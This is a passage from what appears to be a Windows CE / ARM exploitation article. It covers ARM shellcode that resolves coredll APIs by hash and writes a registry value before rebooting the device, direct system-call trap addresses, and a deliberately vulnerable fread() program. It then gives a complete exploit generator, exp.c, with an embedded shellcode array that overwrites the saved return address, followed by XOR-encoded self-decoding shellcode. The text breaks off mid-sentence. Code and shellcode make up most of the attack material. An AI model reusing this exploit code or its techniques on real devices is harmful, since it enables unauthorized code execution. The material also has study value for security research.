        ldr     pc, [r8, #-8]  ; RegSetValueExW

        ldr     r0, [sp, #8]
        mov     lr, pc
        ldr     pc, [r8, #-4]  ; RegCloseKey

        adr     r0, sf
        ldr     r0, [r0]
        ;ldr     r0, =0x0101003c
        mov     r1, #0
        mov     r2, #0
        mov     r3, #0
        mov     lr, pc
        ldr     pc, [r8, #-16] ; KernelIoControl
      
        ; basic wide string compare
    wstrcmp   PROC
    wstrcmp_iterate
        ldrh    r2, [r0], #2
        ldrh    r3, [r1], #2

        cmp     r2, #0
        cmpeq   r3, #0
        moveq   pc, lr

        cmp     r2, r3
        beq     wstrcmp_iterate

        mov     pc, lr
        ENDP

    ; output:
    ;  r0 - coredll base addr
    ;  r1 - export section addr
    get_export_section   PROC
        mov     r11, lr
        adr     r4, kd
        ldr     r4, [r4]
        ;ldr     r4, =0xffffc800     ; KDataStruct
        ldr     r5, =0x324          ; aInfo[KINX_MODULES]

        add     r5, r4, r5
        ldr     r5, [r5]

        ; r5 now points to first module

        mov     r6, r5
        mov     r7, #0

    iterate
        ldr     r0, [r6, #8]        ; get dll name
        adr     r1, coredll
        bl      wstrcmp             ; compare with coredll.dll

        ldreq   r7, [r6, #0x7c]     ; get dll base
        ldreq   r8, [r6, #0x8c]     ; get export section rva

        add     r9, r7, r8
        beq     got_coredllbase     ; is it what we're looking for?

        ldr     r6, [r6, #4]
        cmp     r6, #0
        cmpne   r6, r5
        bne     iterate             ; nope, go on

    got_coredllbase
        mov     r0, r7
        add     r1, r8, r7          ; yep, we've got imagebase
                                    ; and export section pointer

        mov     pc, r11
        ENDP

    ; r0 - coredll base addr
    ; r1 - export section addr
    ; r2 - function name addr
    find_func   PROC
        adr     r8, fn
    find_func_loop
        ldr     r4, [r1, #0x20]     ; AddressOfNames
        add     r4, r4, r0

        mov     r6, #0              ; counter
      
    find_start
        ldr     r7, [r4], #4
        add     r7, r7, r0          ; function name pointer
        ;mov     r8, r2             ; find function name

        mov     r10, #0
    hash_loop
        ldrb    r9, [r7], #1
        cmp     r9, #0
        beq     hash_end
        add     r10, r9, r10, ROR #7          
        b       hash_loop

    hash_end
        ldr     r9, [r8]
        cmp     r10, r9 ; compare the hash
        addne   r6, r6, #1      
        bne     find_start

        ldr     r5, [r1, #0x24]     ; AddressOfNameOrdinals
        add     r5, r5, r0
        add     r6, r6, r6
        ldrh    r9, [r5, r6]        ; Ordinals
        ldr     r5, [r1, #0x1c]     ; AddressOfFunctions
        add     r5, r5, r0
        ldr     r9, [r5, r9, LSL #2]; function address rva
        add     r9, r9, r0          ; function address

        str     r9, [r8], #4
        subs    r2, r2, #1
        bne     find_func_loop

        mov     pc, lr
        ENDP

    kd  DCB     0x00, 0xc8, 0xff, 0xff ; 0xffffc800
    sf  DCB     0x3c, 0x00, 0x01, 0x01 ; 0x0101003c

    fn  DCB     0xe7, 0x9d, 0x3a, 0x28 ; KernelIoControl
        DCB     0x51, 0xdf, 0xf7, 0x0b ; RegOpenKeyExW
        DCB     0xc0, 0xfe, 0xc0, 0xd8 ; RegSetValueExW
        DCB     0x83, 0x17, 0x51, 0x0e ; RegCloseKey

    key DCB    "S", 0x0, "O", 0x0, "F", 0x0, "T", 0x0, "W", 0x0, "A", 0x0, "R", 0x0, "E", 0x0
        DCB    "\\", 0x0, "\\", 0x0, "W", 0x0, "i", 0x0, "d", 0x0, "c", 0x0, "o", 0x0, "m", 0x0
        DCB    "m", 0x0, "\\", 0x0, "\\", 0x0, "B", 0x0, "t", 0x0, "C", 0x0, "o", 0x0, "n", 0x0
        DCB    "f", 0x0, "i", 0x0, "g", 0x0, "\\", 0x0, "\\", 0x0, "G", 0x0, "e", 0x0, "n", 0x0
        DCB    "e", 0x0, "r", 0x0, "a", 0x0, "l", 0x0, 0x0, 0x0, 0x0, 0x0

    val DCB    "S", 0x0, "t", 0x0, "a", 0x0, "c", 0x0, "k", 0x0, "M", 0x0, "o", 0x0, "d", 0x0
        DCB    "e", 0x0, 0x0, 0x0

    coredll DCB    "c", 0x0, "o", 0x0, "r", 0x0, "e", 0x0, "d", 0x0, "l", 0x0, "l", 0x0
            DCB    ".", 0x0, "d", 0x0, "l", 0x0, "l", 0x0, 0x0, 0x0

        ALIGN   4

        LTORG
    test_end

    WinMainCRTStartup PROC
        b     test_code_start
        ENDP

        END

    This shellcode consists of three parts. First, it calls the
    get_export_section function to obtain the virtual base address of coredll
    and the virtual address of its export table, which are returned in r0 and
    r1. Second, it calls the find_func function to resolve the API addresses
    through the IMAGE_EXPORT_DIRECTORY structure and stores each address over
    its own hash value. The last part is the payload of our shellcode: it
    sets the registry value
    HKLM\SOFTWARE\Widcomm\BtConfig\General\StackMode to 1 and then uses
    KernelIoControl to soft-reset the system.
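
    As a rough C rendering of what find_func does, the sketch below walks an
    export directory held in a byte buffer and returns the RVA of the export
    whose name hashes to a given value. The offsets 0x1c, 0x20 and 0x24 are
    the ones used in test.asm. The names find_export_rva, rd16, rd32 and
    name_hash are hypothetical, and the NumberOfNames bound read from offset
    0x18 is an addition of this sketch (the assembly simply loops until a
    hash matches). It is an illustration under those assumptions, not the
    code that runs on the device.

```c
#include <stdint.h>

/* Field offsets inside IMAGE_EXPORT_DIRECTORY. */
enum {
    EXP_NUMBER_OF_NAMES   = 0x18,
    EXP_ADDR_OF_FUNCTIONS = 0x1c,
    EXP_ADDR_OF_NAMES     = 0x20,
    EXP_ADDR_OF_ORDINALS  = 0x24
};

/* Little-endian loads that do not depend on host byte order. */
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Same recurrence as hash_loop in test.asm: h = c + ROR(h, 7). */
static uint32_t name_hash(const uint8_t *s)
{
    uint32_t h = 0;
    for (; *s != 0; s++)
        h = *s + ((h >> 7) | (h << 25));
    return h;
}

/* Return the RVA of the export whose name hashes to `want`,
 * or 0 if no name matches. `image` points at the module base. */
uint32_t find_export_rva(const uint8_t *image, uint32_t export_dir_rva,
                         uint32_t want)
{
    const uint8_t *dir   = image + export_dir_rva;
    uint32_t       count = rd32(dir + EXP_NUMBER_OF_NAMES);
    const uint8_t *names = image + rd32(dir + EXP_ADDR_OF_NAMES);
    const uint8_t *ords  = image + rd32(dir + EXP_ADDR_OF_ORDINALS);
    const uint8_t *funcs = image + rd32(dir + EXP_ADDR_OF_FUNCTIONS);
    uint32_t i;

    for (i = 0; i < count; i++) {
        const uint8_t *name = image + rd32(names + 4u * i);
        if (name_hash(name) == want) {
            uint16_t ordinal = rd16(ords + 2u * i);  /* index into funcs */
            return rd32(funcs + 4u * ordinal);
        }
    }
    return 0;
}
```

    The shellcode adds the coredll base to this RVA to get the callable
    address; the sketch stops at the RVA so that it can be tried on any
    buffer laid out like a PE export section.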

    Windows CE.NET provides BthGetMode and BthSetMode to get and set the
    Bluetooth state. But HP iPAQs use the Widcomm stack, which has its own
    API, so BthSetMode can't turn on Bluetooth on an iPAQ. There is another
    way to turn on Bluetooth on iPAQs (my PDA is an HP1940): just change
    HKLM\SOFTWARE\Widcomm\BtConfig\General\StackMode to 1 and reset the PDA,
    and Bluetooth will be on after the system restarts. This method is not
    pretty, but it works.

    Now let's look at the get_export_section function. Why did I comment out
    the "ldr r4, =0xffffc800" instruction? We must pay attention to the ARM
    assembler's LDR pseudo-instruction. It can load a register with a 32-bit
    constant value or an address. The instruction "ldr r4, =0xffffc800"
    becomes "ldr r4, [pc, #0x108]" in the EVC debugger: the constant is
    placed in a literal pool and loaded pc-relative, so what r4 receives
    depends on the layout of the program. In the shellcode r4 won't get the
    0xffffc800 value, and the shellcode will fail. The instruction
    "ldr r5, =0x324" becomes "mov r5, #0xC9, 30" in the EVC debugger, which
    is fine when the shellcode is executed, because the constant is encoded
    in the instruction itself. The simple solution is to embed the large
    constant in the shellcode, use the ADR pseudo-instruction to load the
    address of the value into a register, and then read the value from
    memory into the register.
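
    To see which constants the assembler can fold into a single mov, the
    following C sketch tests whether a 32-bit value fits the ARM
    data-processing immediate form (an 8-bit value rotated right by an even
    amount). The function names are hypothetical, and the sketch only
    considers the plain mov form, not mvn.

```c
#include <stdint.h>

/* Rotate left by n bits; n == 0 is handled separately because a
 * shift by 32 is undefined in C. */
static uint32_t rol32(uint32_t v, unsigned n)
{
    return n == 0 ? v : (v << n) | (v >> (32u - n));
}

/* Try to express v as (imm8 ROR rot) with rot even, 0..30.
 * Returns 1 and fills *imm8 and *rot on success, 0 otherwise. */
int arm_encode_imm(uint32_t v, unsigned *imm8, unsigned *rot)
{
    unsigned r;

    for (r = 0; r < 32; r += 2) {
        uint32_t candidate = rol32(v, r);  /* undoes a ROR by r */
        if (candidate <= 0xFFu) {
            *imm8 = (unsigned)candidate;
            *rot = r;
            return 1;
        }
    }
    return 0;
}
```

    With this check, 0x324 comes out as 0xC9 rotated by 30, matching the
    "mov r5, #0xC9, 30" seen in the debugger, while 0xffffc800 has no such
    form, which is why the assembler falls back to a literal pool load.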

    To save space, we can use a hash to encode the API names. Each API name
    is encoded into 4 bytes. The hash technique comes from LSD's Win32
    Assembly Components.
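
    The hash used by hash_loop in test.asm can be written in a few lines of
    C, which is handy for generating the fn table on a desktop machine. The
    function names below are hypothetical; the recurrence itself,
    h = c + ROR(h, 7) over the bytes of the name, is taken from the
    "add r10, r9, r10, ROR #7" instruction.

```c
#include <stdint.h>

/* Rotate a 32-bit value right by n bits, for 0 < n < 32. */
static uint32_t ror32(uint32_t v, unsigned n)
{
    return (v >> n) | (v << (32u - n));
}

/* Hash a NUL-terminated API name the way hash_loop does:
 * for every byte c, h = c + ROR(h, 7), starting from h = 0. */
uint32_t api_name_hash(const char *name)
{
    uint32_t h = 0;

    while (*name != '\0') {
        h = (uint32_t)(unsigned char)*name + ror32(h, 7);
        name++;
    }
    return h;
}
```

    For "KernelIoControl" this gives 0x283A9DE7, which is the first entry of
    the fn table when its four bytes (0xe7, 0x9d, 0x3a, 0x28) are read as a
    little-endian word.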

    It is compiled as follows:

    armasm test.asm
    link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj

    You must install the EVC environment first. After that, we can obtain the
    necessary opcodes from the EVC debugger, IDA Pro, or a hex editor.


    --[ 8 - System Call

    First, let's look at the implementation of an API in coredll.dll:

    .text:01F75040                 EXPORT PowerOffSystem
    .text:01F75040 PowerOffSystem                          ; CODE XREF: SetSystemPowerState+58p
    .text:01F75040                 STMFD   SP!, {R4,R5,LR}
    .text:01F75044                 LDR     R5, =0xFFFFC800
    .text:01F75048                 LDR     R4, =unk_1FC6760
    .text:01F7504C                 LDR     R0, [R5]        ; UTlsPtr
    .text:01F75050                 LDR     R1, [R0,#-0x14] ; KTHRDINFO
    .text:01F75054                 TST     R1, #1
    .text:01F75058                 LDRNE   R0, [R4]        ; 0x8004B138 ppfnMethods
    .text:01F7505C                 CMPNE   R0, #0
    .text:01F75060                 LDRNE   R1, [R0,#0x13C] ; 0x8006C92C SC_PowerOffSystem
    .text:01F75064                 LDREQ   R1, =0xF000FEC4 ; trap address of SC_PowerOffSystem
    .text:01F75068                 MOV     LR, PC
    .text:01F7506C                 MOV     PC, R1
    .text:01F75070                 LDR     R3, [R5]
    .text:01F75074                 LDR     R0, [R3,#-0x14]
    .text:01F75078                 TST     R0, #1
    .text:01F7507C                 LDRNE   R0, [R4]
    .text:01F75080                 CMPNE   R0, #0
    .text:01F75084                 LDRNE   R0, [R0,#0x25C] ; SC_KillThreadIfNeeded
    .text:01F75088                 MOVNE   LR, PC
    .text:01F7508C                 MOVNE   PC, R0
    .text:01F75090                 LDMFD   SP!, {R4,R5,PC}
    .text:01F75090 ; End of function PowerOffSystem

    Stepping into this API in the debugger, we find that the system checks
    KTHRDINFO first. This value is initialized in the MDCreateMainThread2
    function of PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdram.c:

    ...
        if (kmode || bAllKMode) {
            pTh->ctx.Psr = KERNEL_MODE;
            KTHRDINFO (pTh) |= UTLS_INKMODE;
        } else {
            pTh->ctx.Psr = USER_MODE;
            KTHRDINFO (pTh) &= ~UTLS_INKMODE;
        }
    ...

    If the application runs in kernel mode, this bit is set to 1; otherwise
    it is 0. All Pocket PC applications run in kernel mode, so execution
    continues with "LDRNE   R0, [R4]". In my environment, R0 gets 0x8004B138,
    which is the ppfnMethods pointer of SystemAPISets[SH_WIN32], and
    execution then reaches "LDRNE   R1, [R0,#0x13C]". The offset 0x13C
    (0x13C/4 = 0x4F = 79) corresponds to an index into Win32Methods, defined
    in PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h:

    const PFNVOID Win32Methods[] = {
    ...
        (PFNVOID)SC_PowerOffSystem,             // 79
    ...
    };

    So R1 gets the address of SC_PowerOffSystem, which is implemented in the
    kernel. The instruction "LDREQ   R1, =0xF000FEC4" has no effect when the
    application runs in kernel mode. The address 0xF000FEC4 is the system
    call address used from user mode. Some APIs use the system call directly,
    such as SetKMode:

    .text:01F756C0                 EXPORT SetKMode
    .text:01F756C0 SetKMode
    .text:01F756C0
    .text:01F756C0 var_4           = -4
    .text:01F756C0
    .text:01F756C0                 STR     LR, [SP,#var_4]!
    .text:01F756C4                 LDR     R1, =0xF000FE50
    .text:01F756C8                 MOV     LR, PC
    .text:01F756CC                 MOV     PC, R1
    .text:01F756D0                 LDMFD   SP!, {PC}

    Windows CE doesn't use ARM's SWI instruction to implement system calls;
    it implements them in a different way. A system call is made by branching
    to an invalid address in the range 0xf0000000 - 0xf0010000, which causes
    a prefetch-abort trap that is handled by PrefetchAbort, implemented in
    armtrap.s. PrefetchAbort first checks the invalid address: if it is in
    the trap area, it uses ObjectCall to locate and execute the system call;
    otherwise it calls ProcessPrefAbort to deal with the exception.

    There is a formula to calculate the system call address:

    0xf0010000-(256*apiset+apinr)*4

    The API set handles are defined in PUBLIC\COMMON\SDK\INC\kfuncs.h and
    PUBLIC\COMMON\OAK\INC\psyscall.h, and the apinrs are defined in several
    files; for example, the SH_WIN32 calls are defined in
    PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h.

    Let's calculate the system call address of KernelIoControl. The apiset is
    0 and the apinr is 99, so the address is 0xf0010000-(256*0+99)*4, which
    is 0xF000FE74. The following shellcode is implemented with the system
    call:

    #include "stdafx.h"

    int shellcode[] =
    {
    0xE59F0014, // ldr r0, [pc, #20]
    0xE59F4014, // ldr r4, [pc, #20]
    0xE3A01000, // mov r1, #0
    0xE3A02000, // mov r2, #0
    0xE3A03000, // mov r3, #0
    0xE1A0E00F, // mov lr, pc
    0xE1A0F004, // mov pc, r4
    0x0101003C, // IOCTL_HAL_REBOOT
    0xF000FE74, // trap address of KernelIoControl
    };

    int WINAPI WinMain( HINSTANCE hInstance,
                        HINSTANCE hPrevInstance,
                        LPTSTR    lpCmdLine,
                        int       nCmdShow)
    {
        ((void (*)(void)) & shellcode)();

        return 0;
    }

    It works fine, and we don't need to search for API addresses.
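
    The address formula from this section is easy to wrap in a pair of
    helpers, so that trap addresses found in a disassembly can be mapped back
    to an API set and method index. The names trap_address and trap_decode
    are hypothetical, and treating both ends of the 0xf0000000 - 0xf0010000
    range as inclusive is an assumption of this sketch.

```c
#include <stdint.h>

#define TRAP_AREA_BASE 0xF0000000u
#define TRAP_AREA_TOP  0xF0010000u

/* Trap address for an API set and method index, following
 * 0xf0010000 - (256*apiset + apinr)*4. */
uint32_t trap_address(uint32_t apiset, uint32_t apinr)
{
    return TRAP_AREA_TOP - (256u * apiset + apinr) * 4u;
}

/* Inverse of trap_address. Returns 1 and fills *apiset and *apinr,
 * or returns 0 if addr is misaligned or outside the trap area. */
int trap_decode(uint32_t addr, uint32_t *apiset, uint32_t *apinr)
{
    uint32_t n;

    if (addr < TRAP_AREA_BASE || addr > TRAP_AREA_TOP || (addr & 3u) != 0)
        return 0;
    n = (TRAP_AREA_TOP - addr) / 4u;
    *apiset = n / 256u;
    *apinr = n % 256u;
    return 1;
}
```

    For example, trap_address(0, 79) gives 0xF000FEC4, the value loaded by
    the LDREQ in PowerOffSystem, and decoding the 0xF000FE50 used by SetKMode
    yields API set 0, index 108 under this formula.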


    --[ 9 - Windows CE Buffer Overflow Exploitation

    hello.cpp is the vulnerable demonstration program:

    // hello.cpp
    //

    #include "stdafx.h"

    int hello()
    {
        FILE * binFileH;
        char binFile[] = "\\binfile";
        char buf[512];

        if ( (binFileH = fopen(binFile, "rb")) == NULL )
        {
            printf("can't open file %s!\n", binFile);
            return 1;
        }

        memset(buf, 0, sizeof(buf));
        fread(buf, sizeof(char), 1024, binFileH);

        printf("%08x %d\n", &buf, strlen(buf));
        getchar();
       
        fclose(binFileH);
        return 0;
    }

    int WINAPI WinMain( HINSTANCE hInstance,
                        HINSTANCE hPrevInstance,
                        LPTSTR    lpCmdLine,
                        int       nCmdShow)
    {
        hello();
        return 0;
    }

    The hello function has a buffer overflow problem. It uses fread() to read
    data from "binfile" in the root directory into the stack variable "buf".
    Because it reads up to 1KB, the stack variable "buf" will overflow if
    "binfile" is larger than 512 bytes.
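
    For contrast, here is a minimal sketch of the same read with the length
    tied to the destination buffer. The helper name read_bounded is
    hypothetical; the point is only that the count passed to fread() is
    derived from the buffer size rather than hard-coded to 1024.

```c
#include <stdio.h>

/* Read at most cap-1 bytes from fp into buf and NUL-terminate it.
 * Returns the number of bytes actually read. */
size_t read_bounded(FILE *fp, char *buf, size_t cap)
{
    size_t n;

    if (cap == 0)
        return 0;
    n = fread(buf, 1, cap - 1, fp);
    buf[n] = '\0';  /* keeps a later strlen(buf) inside the buffer */
    return n;
}
```

    Called as read_bounded(binFileH, buf, sizeof(buf)) in hello(), it would
    never write past the 512-byte array, no matter how large "binfile" is.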

    The printf and getchar calls are just for testing. They have no effect
    without console.dll in the Windows directory. The console.dll file comes
    from the Windows Mobile Developer Power Toys.

    ARM assembly language uses the bl instruction to call a function. Let's
    look into the hello function:

    6:    int hello()
    7:    {
    22011000   str       lr, [sp, #-4]!
    22011004   sub       sp, sp, #0x89, 30
    8:        FILE * binFileH;
    9:        char binFile[] = "\\binfile";
    ...
    ...
    26:   }
    220110C4   add       sp, sp, #0x89, 30
    220110C8   ldmia     sp!, {pc}

    "str lr, [sp, #-4]!" is the first instruction of the hello() function. It
    stores the lr register on the stack, and the lr register contains the
    return address into the caller of hello. The second instruction reserves
    stack memory for local variables. "ldmia sp!, {pc}" is the last
    instruction of the hello() function. It loads the return address that was
    stored on the stack into the pc register, and the program then continues
    in the WinMain function. So overwriting the saved lr value on the stack
    gives us control when the hello function returns.
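
    The size of the frame can be read straight from the prologue. The sketch
    below decodes the immediate operand of an ARM data-processing instruction
    (an 8-bit value rotated right by twice the 4-bit rotate field); the
    function name arm_decode_imm is hypothetical. The instruction word
    0xE24DDF89 is the encoding of "sub sp, sp, #0x89, 30" that also appears
    in the shellcode array of the exploit.

```c
#include <stdint.h>

/* Decode the immediate operand held in bits 11..0 of an ARM
 * data-processing instruction: imm8 rotated right by 2*rotate. */
uint32_t arm_decode_imm(uint32_t insn)
{
    uint32_t imm8 = insn & 0xFFu;
    unsigned rot  = ((insn >> 8) & 0xFu) * 2u;

    /* rot == 0 is handled separately to avoid a shift by 32. */
    return rot == 0 ? imm8 : (imm8 >> rot) | (imm8 << (32u - rot));
}
```

    arm_decode_imm(0xE24DDF89) is 0x224, so the prologue reserves 548 bytes
    and the saved lr sits directly above them. Since the exploit writes its
    return address 540 bytes into "buf", this suggests "buf" starts 8 bytes
    above the new sp, although that layout is inferred rather than shown in
    the listing.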

    The memory addresses of variables allocated by the program, on both the
    stack and the heap, depend on the slot the process is loaded into. The
    process may be loaded into a different slot each time it starts, so the
    base address changes. We know that slot 0 is mapped from the current
    process's slot, so the base of its stack address is stable.

    The following is the exploit for the hello program:

    /* exp.c - Windows CE Buffer Overflow Demo
    *
    *  san@xfocus.org
    */
    #include <stdio.h>
    #include <string.h>  /* memset, memcpy */

    #define NOP 0xE1A01001  /* mov r1, r1     */
    #define LR  0x0002FC50  /* return address */

    int shellcode[] =
    {
    0xEB000026,
    0xE3A02004,
    0xEB00003A,
    0xE24DDF89,
    0xE28D0008,
    0xE58D0000,
    0xE3A03002,
    0xE3A02000,
    0xE28F1F56,
    0xE3A0010A,
    0xE1A0E00F,
    0xE518F00C,
    0xE3A00001,
    0xE58D000C,
    0xE3A03004,
    0xE58D3004,
    0xE28D100C,
    0xE58D1000,
    0xE28F1F5F,
    0xE59D0008,
    0xE1A0E00F,
    0xE518F008,
    0xE59D0008,
    0xE1A0E00F,
    0xE518F004,
    0xE28F0C01,
    0xE5900000,
    0xE3A01000,
    0xE3A02000,
    0xE3A03000,
    0xE1A0E00F,
    0xE518F010,
    0xE0D020B2,
    0xE0D130B2,
    0xE3520000,
    0x03530000,
    0x01A0F00E,
    0xE1520003,
    0x0AFFFFF8,
    0xE1A0F00E,
    0xE1A0B00E,
    0xE28F40BC,
    0xE5944000,
    0xE3A05FC9,
    0xE0845005,
    0xE5955000,
    0xE1A06005,
    0xE3A07000,
    0xE5960008,
    0xE28F1F45,
    0xEBFFFFEC,
    0x0596707C,
    0x0596808C,
    0xE0879008,
    0x0A000003,
    0xE5966004,
    0xE3560000,
    0x11560005,
    0x1AFFFFF4,
    0xE1A00007,
    0xE0881007,
    0xE1A0F00B,
    0xE28F8070,
    0xE5914020,
    0xE0844000,
    0xE3A06000,
    0xE4947004,
    0xE0877000,
    0xE3A0A000,
    0xE4D79001,
    0xE3590000,
    0x0A000001,
    0xE089A3EA,
    0xEAFFFFFA,
    0xE5989000,
    0xE15A0009,
    0x12866001,
    0x1AFFFFF3,
    0xE5915024,
    0xE0855000,
    0xE0866006,
    0xE19590B6,
    0xE591501C,
    0xE0855000,
    0xE7959109,
    0xE0899000,
    0xE4889004,
    0xE2522001,
    0x1AFFFFE5,
    0xE1A0F00E,
    0xFFFFC800,
    0x0101003C,
    0x283A9DE7,
    0x0BF7DF51,
    0xD8C0FEC0,
    0x0E511783,
    0x004F0053,
    0x00540046,
    0x00410057,
    0x00450052,
    0x005C005C,
    0x00690057,
    0x00630064,
    0x006D006F,
    0x005C006D,
    0x0042005C,
    0x00430074,
    0x006E006F,
    0x00690066,
    0x005C0067,
    0x0047005C,
    0x006E0065,
    0x00720065,
    0x006C0061,
    0x00000000,
    0x00740053,
    0x00630061,
    0x004D006B,
    0x0064006F,
    0x00000065,
    0x006F0063,
    0x00650072,
    0x006C0064,
    0x002E006C,
    0x006C0064,
    0x0000006C,
    };

    /* writes a 32-bit value to a buffer in little-endian byte order */
    char* put_long(char* ptr, long value)
    {
        *ptr++ = (char) (value >> 0) & 0xff;
        *ptr++ = (char) (value >> 8) & 0xff;
        *ptr++ = (char) (value >> 16) & 0xff;
        *ptr++ = (char) (value >> 24) & 0xff;

        return ptr;
    }

    int main()
    {
        FILE * binFileH;
        char binFile[] = "binfile";
        char buf[544];
        char *ptr;
        int  i;

        if ( (binFileH = fopen(binFile, "wb")) == NULL )
        {
            printf("can't create file %s!\n", binFile);
            return 1;
        }

        memset(buf, 0, sizeof(buf)-1);
        ptr = buf;

        for (i = 0; i < 4; i++) {
            ptr = put_long(ptr, NOP);
        }
        memcpy(buf+16, shellcode, sizeof(shellcode));
        put_long(ptr-16+540, LR);

        fwrite(buf, sizeof(char), 544, binFileH);
        fclose(binFileH);
        return 0;
    }

    We choose a stack address in slot 0 that points to our shellcode, and it
    overwrites the return address stored on the stack. We could also use a
    jump address in the virtual memory space of the process instead. This
    exploit produces a "binfile" that overflows the "buf" variable and the
    return address stored on the stack.

    After the binfile is copied to the PDA, the PDA restarts and turns on
    Bluetooth when the hello program is executed. That means the hello
    program jumped to our shellcode.

    I also tried another way of constructing the exploit string, as
    follows:

    pad...pad|return address|nop...nop...shellcode

    That exploit produces a 1KB "binfile", but the PDA freezes when the
    hello program is executed. This was confusing; I think maybe the stack of
    Windows CE is small and the overflow string destroyed the 2KB guard at
    the top of the stack. The freeze happens when the program calls an API
    after the overflow has occurred. So we must take the characteristics of
    the stack into account when writing exploits for Windows CE.

    EVC has some bugs that make debugging difficult. First, EVC writes some
    arbitrary data to the stack when the stack is released at the end of a
    function, so the shellcode may be modified. Second, the instruction at a
    breakpoint may be changed to 0xE6000010 by EVC while debugging. Another
    bug is funny: the debugger reports no error when data is written to a
    .text address during single-stepping, but an access violation exception
    is raised when the same code is executed directly.


    --[ 10 - About Decoding Shellcode

    The shellcode discussed above is a proof-of-concept shellcode that
    contains lots of zeros. It executes correctly in this demonstration
    program, but other vulnerable programs may filter special characters
    before the buffer overflow occurs. For example, if the overflow happens
    through strcpy, the shellcode will be cut off at the first zero byte.
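
    A quick way to see where a strcpy-style copy would stop is to scan the
    byte image of the shellcode for the first zero. The sketch below does
    this for an array of 32-bit words laid out in little-endian order, as on
    the ARM targets discussed here; the function name first_nul_offset is
    hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Return the byte offset of the first 0x00 in the little-endian
 * byte image of `words`, or -1 if the image contains no zero byte. */
long first_nul_offset(const uint32_t *words, size_t count)
{
    size_t i;
    unsigned b;

    for (i = 0; i < count; i++) {
        for (b = 0; b < 4; b++) {
            if (((words[i] >> (8u * b)) & 0xFFu) == 0)
                return (long)(i * 4 + b);
        }
    }
    return -1;
}
```

    Applied to the shellcode array in exp.c, whose first word is 0xEB000026,
    the result is 1: a string copy would carry over only the first byte.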

    It is difficult and inconvenient to write a shellcode without special
    characters using the API search method. So we consider a decoding
    shellcode. A decoding shellcode stores the real shellcode in an encoded
    form that contains only acceptable characters and decodes it at run
    time, which makes the real shellcode more universal.

    The newer ARM processors (such as ARM9 and ARM10) have a Harvard
    architecture, which separates the instruction cache and the data cache.
    This feature improves the performance of the processor, and most RISC
    processors have it. But self-modifying code is not easy to implement,
    because after the code is modified its behaviour depends on the caches
    and on the processor implementation.

    Let's look at the following code first:

    #include "stdafx.h"

    int weird[] =
    {
    0xE3A01099, // mov       r1, #0x99

    0xE5CF1020, // strb      r1, [pc, #0x20]
    0xE5CF1020, // strb      r1, [pc, #0x20]
    0xE5CF1020, // strb      r1, [pc, #0x20]
    0xE5CF1020, // strb      r1, [pc, #0x20]

    0xE1A01001, // mov       r1, r1 ; pad
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,

    0xE3A04001, // mov       r4, #0x1
    0xE3A03001, // mov       r3, #0x1
    0xE3A02001, // mov       r2, #0x1
    0xE3A01001, // mov       r1, #0x1
    0xE6000010, // breakpoint
    };

    int WINAPI WinMain( HINSTANCE hInstance,
                        HINSTANCE hPrevInstance,
                        LPTSTR    lpCmdLine,
                        int       nCmdShow)
    {
        ((void (*)(void)) & weird)();

        return 0;
    }

    Those four strb instructions change the immediate value of the mov
    instructions below them to 0x99. When this code is executed directly in
    the EVC debugger, it stops at the inserted breakpoint. The r1-r4
    registers got 0x99 on the S3C2410, which is an ARM9 core processor. When
    I tested this code on my friend's PDA, which has an Intel XScale
    processor, it needed more nop instructions as padding after the
    modification before r1-r4 got 0x99. I think the reason may be that the
    ARM9 has a 5-stage pipeline and the ARM10 has a 6-stage pipeline. So I
    changed to another method:

    0xE28F3053, // add       r3, pc, #0x53

    0xE3A01010, // mov       r1, #0x10
    0xE7D32001, // ldrb      r2, [r3, +r1]
    0xE2222088, // eor       r2, r2, #0x88
    0xE7C32001, // strb      r2, [r3, +r1]
    0xE2511001, // subs      r1, r1, #1
    0x1AFFFFFA, // bne       28011008

    //0xE1A0100F, // mov       r1, pc
    //0xE3A02020, // mov       r2, #0x20
    //0xE3A03D05, // mov       r3, #5, 26
    //0xEE071F3A, // mcr       p15, 0, r1, c7, c10, 1 ; clean and invalidate each entry
    //0xE0811002, // add       r1, r1, r2
    //0xE0533002, // subs      r3, r3, r2
    //0xCAFFFFFB, // bgt       |weird+28h (30013058)|
    //0xE0211001, // eor       r1, r1, r1
    //0xEE071F9A, // mcr       p15, 0, r1, c7, c10, 4 ; drain write buffer
    //0xEE071F15, // mcr       p15, 0, r1, c7, c5, 0  ; flush the icache
    0xE1A01001, // mov       r1, r1 ; pad
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,
    0xE1A01001,

    0x6B28C889, // mov       r4, #0x1 ; encoded
    0x6B28B889, // mov       r3, #0x1
    0x6B28A889, // mov       r2, #0x1
    0x6B289889, // mov       r1, #0x1
    0xE6000010, // breakpoint

    The four mov instructions are encoded by XORing each byte with 0x88. The
    decoder loops, loading an encoded byte, XORing it with 0x88, and storing
    it back to its original position. The r1-r4 registers don't get 0x1 even
    if you put a lot of pad instructions after the decoder, on both ARM9 and
    ARM10 processors. I think the load instruction may cause a cache
    problem.
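
    The encoding side is simple enough to do on a desktop machine. The
    following C sketch XORs every byte of each instruction word with a
    one-byte key; the function name xor_words is hypothetical. It only shows
    the data transformation and says nothing about the cache behaviour on
    the device, which is the real obstacle described here.

```c
#include <stddef.h>
#include <stdint.h>

/* XOR every byte of each 32-bit word with `key`.
 * Applying the function twice restores the original words. */
void xor_words(uint32_t *words, size_t count, uint8_t key)
{
    uint32_t mask = key * 0x01010101u;  /* key replicated into 4 bytes */
    size_t i;

    for (i = 0; i < count; i++)
        words[i] ^= mask;
}
```

    With key 0x88, the word 0xE3A04001 (mov r4, #0x1) becomes 0x6B28C889,
    which is the first encoded word in the listing above.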

    The ARM Architecture Reference Manual has a chapter on how to deal with
    self-modifying code. It says the caches will be flushed by an operating
    system call. Phil, the guy from 0dd, shared his experience with me. He
